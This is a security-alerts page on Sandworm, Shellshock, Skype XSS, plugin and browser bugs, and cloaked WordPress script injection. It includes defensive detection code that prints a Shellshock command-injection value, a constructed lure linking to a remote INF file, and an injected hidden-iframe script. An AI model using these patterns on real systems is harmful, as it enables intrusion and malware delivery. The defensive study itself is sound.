Vulnerability Alerts

IT Security Vulnerability Alerts provided by Security I Trust

A zero-day vulnerability affecting every Microsoft-supported version of the Windows operating system, including Windows Server, has been identified. We have also seen reports from iSIGHT Partners identifying a cyber-espionage campaign that is already exploiting it against exposed systems.

The vulnerability is identified as CVE-2014-4114 and is also known as Sandworm, the name iSIGHT Partners gave to the attack group using it. It was reportedly discovered in the wild in connection with a cyber-espionage campaign that iSIGHT Partners has attributed to Russia. The zero-day is reported to have been in use since early September to infect victims with malicious attachments, primarily PowerPoint files. Although the attackers used PowerPoint as their delivery vector, the flaw is in Windows itself, not in Office.

The vulnerability is in the OLE packager (packager.dll), the Windows and Windows Server component that handles embedded OLE package objects in Office documents. A crafted document can point an embedded package at an external file such as an INF on a remote share; the packager downloads and executes it, which lets the attacker run arbitrary commands with the rights of the user who opened the document.

Risk Level

The risk level appears high. Sandworm is the name of the attack group, not a self-propagating worm, but now that one group has built a working exploit for the hole, others will try to reproduce it and use it far more widely than in a targeted espionage campaign.

Impact: we are only at an early stage of understanding what we are looking at, but a vulnerability that lets a document download and execute an arbitrary file gives the attacker code execution as the user who opened it, so the potential impact is extremely high.

Solution: Microsoft fixed CVE-2014-4114 in security bulletin MS14-060 (14 October 2014); apply that update on every supported Windows and Windows Server version, and until it is installed treat unsolicited Office attachments, especially PowerPoint files, as hostile.
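
A quick way to triage a suspect document for the delivery pattern described above, as an added example (not code from iSIGHT, Microsoft or this site): it opens an OOXML package (PPSX, PPTX and DOCX files are zip containers), reads every relationships part and reports OLE object relationships whose target is external, flagging UNC paths and executable file types. The sample package built in the block, the function names and the 203.0.113.5 address are constructed for the example.

```python
"""Triage an OOXML document for externally sourced OLE package objects.

Added example for the CVE-2014-4114 delivery pattern; not code from iSIGHT,
Microsoft or this site. The sample package built below is constructed for
illustration and 203.0.113.5 is a documentation address, not a real server.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# File types the OLE packager hands to the shell (or the INF installer) after
# fetching them. Attackers can also hide a PE behind a harmless-looking name
# such as .gif, so the UNC check below matters more than the extension check.
RISKY_EXT = (".inf", ".exe", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".dll")
UNC_RE = re.compile(r"^(file:///)?\\\\[^\\]+\\", re.IGNORECASE)


def find_external_ole_targets(package: bytes) -> list:
    """Return one dict per OLE relationship whose target lies outside the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("Type") != OLE_REL:
                    continue
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                target = rel.get("Target", "")
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "target": target,
                    "unc": bool(UNC_RE.match(target)),
                    "risky_ext": target.lower().endswith(RISKY_EXT),
                })
    return findings


def is_suspicious(package: bytes) -> bool:
    """True if any external OLE target is a UNC path or an executable file type."""
    if not zipfile.is_zipfile(io.BytesIO(package)):
        return False  # not an OOXML container; out of scope for this check
    return any(f["unc"] or f["risky_ext"] for f in find_external_ole_targets(package))


def build_sample(target: str) -> bytes:
    """Constructed minimal PPSX-like package with one OLE object linked to `target`."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/slideLayout" '
        'Target="../slideLayouts/slideLayout1.xml"/>'
        '<Relationship Id="rId2" Type="%s" Target="%s" TargetMode="External"/>'
        '</Relationships>'
    ) % (RELS_NS, OLE_REL, target)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("ppt/slides/slide1.xml", "<sld/>")
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Shaped like the lure described above: OLE package fetched from an SMB share.
    evil = build_sample(r"file:///\\203.0.113.5\public\slides.inf")
    # A linked spreadsheet over HTTPS: external, but not the pattern we hunt for.
    benign = build_sample("https://intranet.example.com/reports/q3.xlsx")
    for label, doc in (("evil", evil), ("benign", benign)):
        print(label, is_suspicious(doc), find_external_ole_targets(doc))
```

Run it over a mail quarantine or a share of incoming documents and review every hit by hand; an external OLE relationship to an HTTP address is unusual but legitimate in some environments, whereas one pointing at a UNC path on the Internet has no business purpose.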

http://www.tripwire.com/state-of-security/incident-detection/microsoft-windows-zero-day-exploit-sandworm-used-in-cyber-espionage-cve-2014-4114/

iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign: http://www.isightpartners.com/2014/10/cve-2014-4114/

http://www.theregister.co.uk/2014/10/14/isight_microsoft_announce_windows_and_windows_server_0day/


Russian Hackers Target EU, NATO

Shellshock Bash code injection vulnerability: what do you need to do, and what is the risk?

Report from SANS ISC

Bash Code Injection (Shellshock) Vulnerability (CVE-2014-6271)

CentOS Bash vulnerability announced on 2014/09/24: how to fix

How to fix the Bash code injection flaw on CentOS/Red Hat 6.x servers

HackerKast: Shellshock, September 25, 2014 (WhiteHat Security)
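
To answer the heading's first question on a given host, an added example (not code from SANS ISC, Red Hat or this site) that reproduces the condition the way a CGI web server creates it: a request header copied into the environment of a bash process. The function names and the marker string are ours. On CentOS/Red Hat 6.x the fix is "yum update bash" (check the installed package with "rpm -q bash"); the first fix was incomplete and the follow-up CVE-2014-7169 required a second bash update, so re-run the check after patching.

```python
"""Reproduce the Shellshock (CVE-2014-6271) trigger and check the local bash.

Added example; not code from SANS ISC, Red Hat or this site. Function names
and the marker string are ours.
"""
import shutil
import subprocess

# A CGI server copies request headers into the environment of the handler it
# spawns (HTTP_USER_AGENT, HTTP_COOKIE, ...). An unpatched bash imports every
# variable whose value starts with "() {" as a function definition and, because
# of the bug, keeps executing whatever follows the closing brace. The attacker
# therefore needs nothing more than a crafted User-Agent header. Any other
# program that starts bash with attacker-controlled environment (DHCP clients,
# SSH ForceCommand, cron wrappers) is exposed in the same way.
PAYLOAD = "() { :;}; echo SHELLSHOCK_MARKER"
MARKER = "SHELLSHOCK_MARKER"


def classify(bash_stdout: str) -> str:
    """Map the output of the probe to a verdict."""
    return "vulnerable" if MARKER in bash_stdout else "patched"


def shellshock_check(bash: str = "bash") -> str:
    """Return 'vulnerable', 'patched' or 'unknown' (bash not runnable)."""
    path = shutil.which(bash)
    if path is None:
        return "unknown"
    try:
        result = subprocess.run(
            [path, "-c", "echo probe"],
            # Minimal environment: only PATH plus the "header" a CGI server would add.
            env={"PATH": "/usr/bin:/bin", "HTTP_USER_AGENT": PAYLOAD},
            capture_output=True, text=True, timeout=10,
        )
    except (OSError, subprocess.TimeoutExpired):
        return "unknown"
    # A fixed bash prints only "probe"; a vulnerable one prints the marker first.
    return classify(result.stdout)


if __name__ == "__main__":
    verdict = shellshock_check()
    print("bash on this host:", verdict)
    if verdict == "vulnerable":
        print("CentOS/RHEL 6: run 'yum update bash', then re-run this check.")
```

The probe is harmless (it only echoes a marker), but it is the same mechanism the in-the-wild scanners used with a reverse shell or wget in place of the echo, which is why every Internet-facing CGI script, and every host behind one, needs the updated bash package rather than a web-application-firewall rule alone.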

iPhone Skype XSS Vulnerability Lets Hackers Steal Phonebook

An XSS vulnerability in the Skype app for iPhone is claimed to allow attackers to steal the contents of your phonebook. The bug in the latest version of Skype for iPhone and iPod touch lets an attacker read a user's address book just by having the user view a specially crafted message, according to AppSec Consulting security researcher Phil Purviance.

WordPress WP-DBManager Plugin Vulnerabilities

Level: Critical

Impact: Cross Site Scripting

Risk: Exposure of system information and exposure of sensitive information

Solution: Vendor Patch

Software: WordPress WP-DBManager Plugin 2.x

Description: Two vulnerabilities have been identified in the WP-DBManager plugin for WordPress (blog software), which can be exploited to conduct cross-site scripting attacks and to disclose sensitive information.

Solution: Update to version 2.62.

Google Chrome: multiple security vulnerabilities

Affected version: Google Chrome prior to 5.0.375.99

Versions of Chrome before 5.0.375.99 contain multiple security vulnerabilities, fixed in the July 2010 stable channel update.

  • Four of the vulnerabilities involve memory corruption, so it is possible that some of them can be used for code execution.
  • Three of the bugs relate specifically to Chrome's handling of SVG and PNG images and CSS style sheets.
  • The remaining one is in Chrome's bidirectional (bidi) text algorithm.

Status: vendor confirmed, updates available

References: Vendor Home Page http://www.google.com

Google Chrome Stable Channel Update http://googlechromereleases.blogspot.com/2010/07/stable-channel-update.html

SecurityFocus BID http://www.securityfocus.com/bid/41334/

According to various reports, in the past few days a large number of websites built with WordPress have been hacked. Unconfirmed reports by WPSecurityLock suggest that other PHP-based content management systems, such as the Zen Cart eCommerce solution, have also been targeted.

The hacked pages have been injected with scripts that not only install malware on visitors' systems but also prevent browsers such as Firefox and Google Chrome, which use Google's Safe Browsing API, from warning users when they open the page. When Google's crawler requests such a page, the server returns only harmless code, so the page is never flagged. This cloaking trick abuses the User-Agent switch that developers normally use to return browser-specific code for the functional differences between browsers such as Internet Explorer and Firefox: the malicious script is served only to User-Agent strings that belong to real browsers.

Experts are still puzzled over which hole was actually exploited in the large-scale attack. The only thing that seems certain at this point is that the problem did not originate in WordPress itself, because if it had, considerably more pages would have been infected. It is still unknown which WordPress versions are being attacked.
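
The cloaking described above can be checked from the outside, as an added example (not code from WPSecurityLock or this site): request the same page once with a crawler User-Agent and once with a browser User-Agent and report the script elements that appear only in the browser's copy. The two page bodies embedded in the block are constructed, the 203.0.113.9 address is a documentation address, and the function names are ours.

```python
"""Detect User-Agent cloaking of injected scripts.

Added example for the WordPress compromise described above; not code from
WPSecurityLock or this site. The two HTML responses below are constructed to
show the pattern: a script that appears only when the visitor looks like a
real browser. Function names are ours.
"""
import re
import urllib.request

CRAWLER_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1; rv:4.0) Gecko/20100101 Firefox/4.0"
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def fetch_as(url: str, user_agent: str) -> str:
    """Fetch `url` presenting the given User-Agent (network access required)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", errors="replace")


def scripts_in(html: str) -> set:
    """Whitespace-normalised set of <script> elements in the page."""
    return {" ".join(s.split()) for s in SCRIPT_RE.findall(html)}


def cloaked_scripts(crawler_html: str, browser_html: str) -> list:
    """Scripts served to the browser that the crawler never sees.

    Legitimate pages also vary between requests (nonces, ads, A/B tests), so
    treat the result as a lead to inspect by hand, not as a verdict.
    """
    return sorted(scripts_in(browser_html) - scripts_in(crawler_html))


def check_url(url: str) -> list:
    """Compare the live responses for the two User-Agents."""
    return cloaked_scripts(fetch_as(url, CRAWLER_UA), fetch_as(url, BROWSER_UA))


# Constructed responses standing in for a compromised blog's front page: the
# crawler gets CLEAN_PAGE, a real browser gets INJECTED_PAGE.
CLEAN_PAGE = """<html><head><title>My blog</title>
<script src="/wp-includes/js/jquery.js"></script></head>
<body><h1>My blog</h1></body></html>"""
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script>document.write(unescape("%3Ciframe src=%22http://203.0.113.9/x/%22 '
    'width=1 height=1%3E%3C/iframe%3E"));</script></body>',
)

if __name__ == "__main__":
    for s in cloaked_scripts(CLEAN_PAGE, INJECTED_PAGE):
        print("served to browsers only:", s)
```

Because the cloaking is keyed on the User-Agent, a scan that only uses a crawler identity (or only Google's own verdict) will report the site as clean; run the comparison from a host the attackers have no reason to whitelist, and follow up on the server itself by diffing the theme and plugin files against a known-good copy.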